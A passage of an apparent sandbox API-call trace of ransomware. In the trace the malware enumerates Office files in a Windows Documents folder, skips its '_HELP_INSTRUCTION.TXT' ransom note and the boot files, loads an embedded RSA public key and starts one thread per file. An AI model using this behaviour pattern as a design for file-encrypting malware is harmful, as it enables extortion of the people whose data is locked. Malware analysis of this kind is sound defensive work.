(lpFirst="dKWKVTxHxijfZD_dSm_.xlsx", lpSrch="NTDETECT.COM") returned 0x0 [0037.067] StrStrW (lpFirst="dKWKVTxHxijfZD_dSm_.xlsx", lpSrch="ntdetect.com") returned 0x0 [0037.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0037.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0037.067] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0037.067] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.067] lstrcpyW (in: lpString1=0x17cf1c, lpString2="dKWKVTxHxijfZD_dSm_.xlsx" | out: lpString1="dKWKVTxHxijfZD_dSm_.xlsx") returned="dKWKVTxHxijfZD_dSm_.xlsx" [0037.067] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.067] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x450 [0037.068] Sleep (dwMilliseconds=0x96) [0037.217] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.218] lstrcmpW (lpString1="dsL8WL.docx", lpString2="..") returned 1 [0037.218] lstrcmpW (lpString1="dsL8WL.docx", lpString2=".") returned 1 [0037.218] StrStrW (lpFirst="dsL8WL.docx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0037.218] StrStrW (lpFirst="dsL8WL.docx", lpSrch="ntldr") returned 0x0 [0037.218] StrStrW (lpFirst="dsL8WL.docx", lpSrch="NTLDR") returned 0x0 [0037.218] StrStrW (lpFirst="dsL8WL.docx", lpSrch="NTDETECT.COM") returned 0x0 [0037.218] StrStrW (lpFirst="dsL8WL.docx", lpSrch="ntdetect.com") returned 0x0 [0037.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0037.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0037.218] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0037.218] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.218] lstrcpyW (in: lpString1=0x17cf1c, lpString2="dsL8WL.docx" | out: lpString1="dsL8WL.docx") returned="dsL8WL.docx" [0037.218] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.218] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x454 [0037.218] Sleep (dwMilliseconds=0x96) [0037.384] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.384] lstrcmpW (lpString1="e5mivlGcxa-nNKp.docx", lpString2="..") returned 1 [0037.384] lstrcmpW (lpString1="e5mivlGcxa-nNKp.docx", lpString2=".") returned 1 [0037.384] StrStrW (lpFirst="e5mivlGcxa-nNKp.docx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0037.384] StrStrW (lpFirst="e5mivlGcxa-nNKp.docx", lpSrch="ntldr") returned 0x0 [0037.384] StrStrW (lpFirst="e5mivlGcxa-nNKp.docx", lpSrch="NTLDR") returned 0x0 [0037.384] StrStrW (lpFirst="e5mivlGcxa-nNKp.docx", lpSrch="NTDETECT.COM") returned 0x0 [0037.384] StrStrW (lpFirst="e5mivlGcxa-nNKp.docx", lpSrch="ntdetect.com") returned 0x0 [0037.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0037.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0037.384] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0037.384] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.384] lstrcpyW (in: lpString1=0x17cf1c, lpString2="e5mivlGcxa-nNKp.docx" | out: lpString1="e5mivlGcxa-nNKp.docx") returned="e5mivlGcxa-nNKp.docx" [0037.384] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.384] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x444 [0037.385] Sleep (dwMilliseconds=0x96) [0037.608] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.608] lstrcmpW (lpString1="eL7YHoCZexIT pMk.docx", lpString2="..") returned 1 [0037.608] lstrcmpW (lpString1="eL7YHoCZexIT pMk.docx", lpString2=".") returned 1 [0037.608] StrStrW (lpFirst="eL7YHoCZexIT pMk.docx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0037.608] StrStrW (lpFirst="eL7YHoCZexIT pMk.docx", lpSrch="ntldr") returned 0x0 [0037.608] StrStrW (lpFirst="eL7YHoCZexIT pMk.docx", lpSrch="NTLDR") returned 0x0 [0037.608] StrStrW (lpFirst="eL7YHoCZexIT pMk.docx", lpSrch="NTDETECT.COM") returned 0x0 [0037.608] StrStrW (lpFirst="eL7YHoCZexIT pMk.docx", lpSrch="ntdetect.com") returned 0x0 [0037.608] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0037.608] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0037.608] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0037.608] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.608] lstrcpyW (in: lpString1=0x17cf1c, lpString2="eL7YHoCZexIT pMk.docx" | out: lpString1="eL7YHoCZexIT pMk.docx") returned="eL7YHoCZexIT pMk.docx" [0037.608] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x45c [0037.608] Sleep (dwMilliseconds=0x96) [0037.764] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.764] lstrcmpW (lpString1="EtzbOnPY1PmFQ.rtf", lpString2="..") returned 1 [0037.764] lstrcmpW (lpString1="EtzbOnPY1PmFQ.rtf", lpString2=".") returned 1 [0037.764] StrStrW (lpFirst="EtzbOnPY1PmFQ.rtf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0037.764] StrStrW (lpFirst="EtzbOnPY1PmFQ.rtf", lpSrch="ntldr") returned 0x0 [0037.764] StrStrW (lpFirst="EtzbOnPY1PmFQ.rtf", lpSrch="NTLDR") returned 0x0 [0037.764] StrStrW (lpFirst="EtzbOnPY1PmFQ.rtf", lpSrch="NTDETECT.COM") returned 0x0 [0037.764] StrStrW (lpFirst="EtzbOnPY1PmFQ.rtf", lpSrch="ntdetect.com") returned 0x0 [0037.764] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0037.764] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0037.764] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0037.764] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.764] lstrcpyW (in: lpString1=0x17cf1c, lpString2="EtzbOnPY1PmFQ.rtf" | out: lpString1="EtzbOnPY1PmFQ.rtf") returned="EtzbOnPY1PmFQ.rtf" [0037.764] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.765] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x448 [0037.765] Sleep (dwMilliseconds=0x96) [0037.983] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.983] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.983] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.983] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.983] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.983] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.983] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.983] lstrcmpW (lpString1="PJ8NaDyMfjtJM01lTM.xlsx", lpString2="..") returned 1 [0037.984] lstrcmpW (lpString1="PJ8NaDyMfjtJM01lTM.xlsx", lpString2=".") returned 1 [0037.984] StrStrW (lpFirst="PJ8NaDyMfjtJM01lTM.xlsx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0037.984] StrStrW (lpFirst="PJ8NaDyMfjtJM01lTM.xlsx", lpSrch="ntldr") returned 0x0 [0037.984] StrStrW (lpFirst="PJ8NaDyMfjtJM01lTM.xlsx", lpSrch="NTLDR") returned 0x0 [0037.984] StrStrW (lpFirst="PJ8NaDyMfjtJM01lTM.xlsx", lpSrch="NTDETECT.COM") returned 0x0 [0037.984] StrStrW (lpFirst="PJ8NaDyMfjtJM01lTM.xlsx", lpSrch="ntdetect.com") returned 0x0 [0037.984] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0037.984] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0037.984] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0037.984] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.984] lstrcpyW (in: lpString1=0x17cf1c, lpString2="PJ8NaDyMfjtJM01lTM.xlsx" | out: lpString1="PJ8NaDyMfjtJM01lTM.xlsx") returned="PJ8NaDyMfjtJM01lTM.xlsx" [0037.984] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x470 [0037.984] Sleep (dwMilliseconds=0x96) [0038.154] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0038.154] lstrcmpW (lpString1="uGN1arUrfzZMomzHA.pptx", lpString2="..") returned 1 [0038.154] lstrcmpW (lpString1="uGN1arUrfzZMomzHA.pptx", lpString2=".") returned 1 [0038.154] StrStrW (lpFirst="uGN1arUrfzZMomzHA.pptx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0038.154] StrStrW (lpFirst="uGN1arUrfzZMomzHA.pptx", lpSrch="ntldr") returned 0x0 [0038.154] StrStrW (lpFirst="uGN1arUrfzZMomzHA.pptx", lpSrch="NTLDR") returned 0x0 [0038.154] StrStrW (lpFirst="uGN1arUrfzZMomzHA.pptx", lpSrch="NTDETECT.COM") returned 0x0 [0038.154] StrStrW (lpFirst="uGN1arUrfzZMomzHA.pptx", lpSrch="ntdetect.com") returned 0x0 [0038.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0038.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0038.154] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0038.154] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0038.154] lstrcpyW (in: lpString1=0x17cf1c, lpString2="uGN1arUrfzZMomzHA.pptx" | out: lpString1="uGN1arUrfzZMomzHA.pptx") returned="uGN1arUrfzZMomzHA.pptx" [0038.154] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0038.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x458 [0038.155] Sleep (dwMilliseconds=0x96) [0038.325] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0038.325] lstrcmpW (lpString1="X2tQqTNWjx7lgtPo5htj.pptx", lpString2="..") returned 1 [0038.325] lstrcmpW (lpString1="X2tQqTNWjx7lgtPo5htj.pptx", lpString2=".") returned 1 [0038.325] StrStrW (lpFirst="X2tQqTNWjx7lgtPo5htj.pptx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0038.325] StrStrW (lpFirst="X2tQqTNWjx7lgtPo5htj.pptx", lpSrch="ntldr") returned 0x0 [0038.325] StrStrW (lpFirst="X2tQqTNWjx7lgtPo5htj.pptx", lpSrch="NTLDR") returned 0x0 [0038.325] StrStrW (lpFirst="X2tQqTNWjx7lgtPo5htj.pptx", lpSrch="NTDETECT.COM") returned 0x0 [0038.325] StrStrW (lpFirst="X2tQqTNWjx7lgtPo5htj.pptx", lpSrch="ntdetect.com") returned 0x0 [0038.325] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0038.325] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0038.325] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0038.325] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0038.325] lstrcpyW (in: lpString1=0x17cf1c, lpString2="X2tQqTNWjx7lgtPo5htj.pptx" | out: lpString1="X2tQqTNWjx7lgtPo5htj.pptx") returned="X2tQqTNWjx7lgtPo5htj.pptx" [0038.325] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0038.325] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x468 [0038.326] Sleep (dwMilliseconds=0x96) [0038.498] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0038.499] lstrcmpW 